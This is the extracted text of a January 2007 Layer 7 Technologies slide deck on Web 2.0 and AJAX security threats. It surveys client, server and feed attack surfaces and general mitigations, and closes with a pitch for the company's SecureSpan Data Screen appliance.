layer 7: securing web 2.0 - what you need to know

January 2007

Securing Web 2.0Securing Web 2.0

What You Need to Know

K. Scott Morrison

VP Engineering and Chief Architect

January 2007

SecureSpan™ Gateway Overview Proprietary and Confidential 2

Bio Bio –– K. Scott MorrisonK. Scott Morrison

VP Engineering & Chief Architect at Layer 7 Technologies• http://www.layer7tech.com

• Layer 7 is based in Vancouver BC, Canada

Co-author of Sams’ Java Web Services Unleashed and Wrox’sProfessional JMS

• Over 50 other publications in academic journals and trade magazines

Co-Editor WS-I Basic Security Profile

Co-Author WS-Federation

Frequent speaker on Web services, XML, mobile/wireless computing systems, distributed systems architecture, and Java design issues

January 2007


AgendaAgenda

� Web 2.0

� AJAX

� What’s new about this?

� The collision between AJAX & SOA

� What are the new threat vectors

� Mitigation strategies

� Infrastructure solutions

January 2007


Web 2.0Web 2.0

Web 2.0 isn’t a technology

It’s actually an approach to building for the Web

Web 2.0 is:

Aggregation of content

Collaboration

Synergizing the efforts of individuals

Rich interaction models

Remember: “You” is not a technology

Graphic source: http://www.time.com/time/covers/0,16641,20061225,00.html

MySpace

Flickr

Google Maps

Google Gmail

Google Suggest

del.icio.us

…etc

January 2007


AJAXAJAX

AJAX is an approach underpinning Web 2.0

Provides rich browser interaction models

� This contributes to goal of fostering individual contributions

Can also be used to aggregate content

AJAX is really a slick new name for existing technology:

1. (X)HTML and CSS for presentation markup

2. DOM and JavaScript for dynamic content

3. XMLHttpRequest (XHR), IFrame, dynamic <SCRIPT> hack

for asynchronous content retrieval

4. XML, JSON, JavaScript Objects, or just text for data communication

So what is different here?

January 2007


Web 1.0Web 1.0

Network Directory Server

Corporate Network

Web Application Server

Web Browser

Firewall

Internet

User clicks link, presses button, is referred, etc

User clicks link, presses button, is referred, etc

January 2007


Web 1.0 Web 1.0 (cont.)(cont.)


Corporate Network


Web Browser

Firewall

Internet

HTTP GET or POST

HTTP GET or POST

HTTP headers+ Query params or POST contents

HTTP Request

AuthN, AuthR

AuthN, AuthR

January 2007


Web 1.0 Web 1.0 (cont.)(cont.)


Corporate Network


Web Browser

Firewall

Internet

HTML, images, JavaScript, etc

New page rendered

New page rendered

HTTP Response

User experiences long latency delays that affects

usability

January 2007


Web 2.0 Web 2.0 –– AJAX ParadigmAJAX Paradigm


Corporate Network


Web Browser

Firewall

Internet

Page load HTML with embedded

JavaScript Engine

Page load HTML with embedded

JavaScript Engine

… Request as before… Request as before

HTML, images, JavaScript engine, etc

HTTP Response

Separation between presentation and content retrieval

January 2007


Web 2.0 Web 2.0 –– AJAX Paradigm AJAX Paradigm (cont.)(cont.)


Corporate Network


Web Browser

Firewall

Internet

XML, JSON, JavaScript

Objects, text, etc

HTTP Response

HTTP GET, POST, PUT,

DELETE, HEAD, etc

HTTP GET, POST, PUT,

DELETE, HEAD, etc

HTTP Request

Service

User interacts with AJAX

engine

User interacts with AJAX

engine

January 2007


Web 2.0 Web 2.0 –– Server Side AggregationsServer Side Aggregations


Corporate Network


Web Browser

Firewall

Internet

RSS, ATOM, XML, etc

External Feeds and Services

User interacts with web app

server

User interacts with web app

server

Server pulls external

information

Server pulls external

information

There are also models for client-side (browser)

aggregation

This, of course could also be an AJAX-based

application

Aggregate content page

Look familiar? It’s data integration all over again…

New data, new transport, same old problems

January 2007


What are the Threats?What are the Threats?

Web Browser

AJAX Engine

New Attack Surface: the AJAX engine

itself

New Attack Surface: the AJAX engine

itself

Loads of potential parameter & injection attacks. Attempts to

hijack session tokens, cookies, etc.

Cross Site Scripting (XSS), Cross Site Reference Forgery (XSRF)

Threats Against The Client

Turn off JavaScript??? No.

Lots of potentially dangerous things to query or even set.

Consider DOM:

� document.URL

� document.cookie

� document.domain

� document.referrer

� etc…

Lots of potentially dangerous things to query or even set.

Consider DOM:

� document.URL

� document.cookie

� document.domain

� document.referrer

� etc…

January 2007


What are the Threats What are the Threats (cont.)(cont.)??

Corporate Network


FirewallThreats Against The Server

Classic Attack Surface, but with new challenges

Classic Attack Surface, but with new challenges

In: Richer parameter attacks, XML-based DOS

attacks, etc

Out: Information leaking, integrity compromise,

injection, etc

80, 443

Big problem: XML parsers are just too helpful and

naive

January 2007


What are the Threats What are the Threats (cont.)(cont.)??

Corporate Network

External Feeds and Services

Threats Against Content

Another classic attack surface, but with still more new challenges

Another classic attack surface, but with still more new challenges

In: Session hijacking, unauthorized access, etc

Out: Integrity compromise, injection of poison content like scripts into XML, etc

Note that the aggregator is just another web client. It’s not a browser, but many similar attack still apply

January 2007


Why Should You Care?Why Should You Care?

Big questions around corporate responsibility

Regulatory issues around privacy (HIPAA, PIPEDA, etc)

Regulatory issues around accountability (Sarbox, etc)

Liability for forged transaction

Liability for damage from compromised servers

Not to mention huge issues around brand and reputation damage accrued

from a significant security event

January 2007


Tactical Security MeasuresTactical Security Measures

Clients (browsers)

Tough area to secure

Must ensure you are serving solid code

Rigorous code review

AJAX has submarine complexity

Ensure that data streams you serve are validated

Redaction, strict validation to tightened schemas

Web Browser

�� Servers offer clean and secure

code

�� Servers offer clean and secure

code

�� Servers offer validated and cleansed data

�� Servers offer validated and cleansed data

The problem with JavaScript is that it makes it easy to write code, but hard to

write secure code

January 2007


Tactical Security Measures Tactical Security Measures (cont.)(cont.)

Core Servers (Web application servers)

More control, and more mature best practices

Add rigorous AuthN, AuthR, Audit

Look at cryptographic model

Inward: DOS protect

Threat protect

Parameter validate

Outward: Schema validation and redaction

�� Validate params

�� Validate params

�� Validate and cleanse data

�� Validate and cleanse data What makes this difficult is the

added complexity of XML data structures, and the richer attack surface of service-based APIs

�� Secure channel�� Secure channel

January 2007


Tactical Security Measures Tactical Security Measures (cont.)(cont.)

Aggregation Servers (Application servers)

Emerging area, with few best practices

Encourage authenticated access model

You may be forced into this anyway…

Look at cryptographic model

Incoming data: Validate feed content

Strip potential exploits like embedded

<SCRIPT> tags

�� Validate and threat protect

data feed

�� Validate and threat protect

data feed

The big problem here is you may not have control of the source of the data. A large number of sites are cracking down

on “unauthorized” use in mashups.

Furthermore, APIs may change radically, making it critical to validate the incoming feed against a schema to

catch API updates

�� Authenticate access

�� Authenticate access

�� Secure channel�� Secure channel

January 2007


Thanks For Nothing Scott: Thanks For Nothing Scott: ““So How Do I Really Do This?So How Do I Really Do This?””

You could just build it into your systems…

But that is brittle and error-prone

What you really need is specialized infrastructure built for this purpose

Needs to be:

High performance

Scalable

Simple to configure

And most important: offer tunable security policy

January 2007


Why Why TunableTunable Policy?Policy?

Not all services are equal:Not all services are equal:

getStockQuote():

anonymous access, unsecure channel

buyStock():

authenticated and authorized access, secured

(integrity and privacy) channel or message

Policy (the security processing model) must be customized to the business requirements

Policy (the security processing model) must be customized to the business requirements

January 2007


Securing Web 2.0: SecureSpan Data ScreenSecuring Web 2.0: SecureSpan Data Screen™™

January 2007



� Hardware appliance for Web, REST, & AJAX security processing.

� ASICs for XML schema validation, XPath, XSLT, cryptographic operations

� Fully clustered

� Policy-based processing model

� Browser-based management and operations console

� Integration with all major directory, IAM, access control servers

� Integration with Symantec antivirus scan engine

Web Browser-based management and

operations

SecureSpan Data Screen™cluster

January 2007




Corporate Network


Web Browser

Internet

� Wire speed schema validation of XML entering network

� Rigorous HTTP parameter validation

� Tight control over HTTP methods (GET, POST, DELETE, PUT, etc). Control over REST.

� Hardware transformation of XML content in and out of network

� Throttle access to back end services

� Traffic shaping across server farms

� XML threat detection

� Endpoint for SSL and XML document security (encryption, signature & canonicalization according to W3C specs)

� Controlled striping of <SCRIPT>, eval() (PHP, JS, Python, etc), shell injection attacks, etc to combat XSS

� Wire speed schema validation of XML entering network

� Rigorous HTTP parameter validation

� Tight control over HTTP methods (GET, POST, DELETE, PUT, etc). Control over REST.

� Hardware transformation of XML content in and out of network

� Throttle access to back end services

� Traffic shaping across server farms

� XML threat detection

� Endpoint for SSL and XML document security (encryption, signature & canonicalization according to W3C specs)

� Controlled striping of <SCRIPT>, eval() (PHP, JS, Python, etc), shell injection attacks, etc to combat XSS

Gateway Deployment For Incoming Calls

Gateway Deployment For Incoming Calls

January 2007




Corporate Network


Web Browser

Proxy Deployment For Outgoing Calls

Proxy Deployment For Outgoing Calls

RSS, ATOM, XML, etc

External Services

� Wire speed validation of XML entering network

� Stripping of potential harmful data in feeds (<SCRIPT>, etc)

� Management of outgoing cryptography and credentials

� Wire speed transformation of XML data to insulate internal servers from external API changes

� Wire speed validation of XML entering network

� Stripping of potential harmful data in feeds (<SCRIPT>, etc)

� Management of outgoing cryptography and credentials

� Wire speed transformation of XML data to insulate internal servers from external API changes

January 2007


SummarySummary

Web 2.0 and the technologies associated with it are too good to ignore

However, they introduce huge new security complexities

The only way to deal with these effectively is with diligence, rigor, and specialized infrastructure to manage an evolving threat model

Layer 7’s SecureSpan Data Screen™ provides the tools to help secure Web 2.0, REST, AJAX, SOA, RSS and ATOM today.

January 2007

K. Scott Morrison

Layer 7 Technologies

1501 – 700 West Georgia St.

Vancouver, B.C. V7Y 1B6

Canada

(800) 681-9377

[email protected]

http://www.layer7tech.com

For further information:

layer 7: securing web 2.0 - what you need to know

Technology

securing web

ajax ajax

sams java web services

ajaxwhats new

ajax soawhat

rich interaction models

chief architectjanuary

technologies http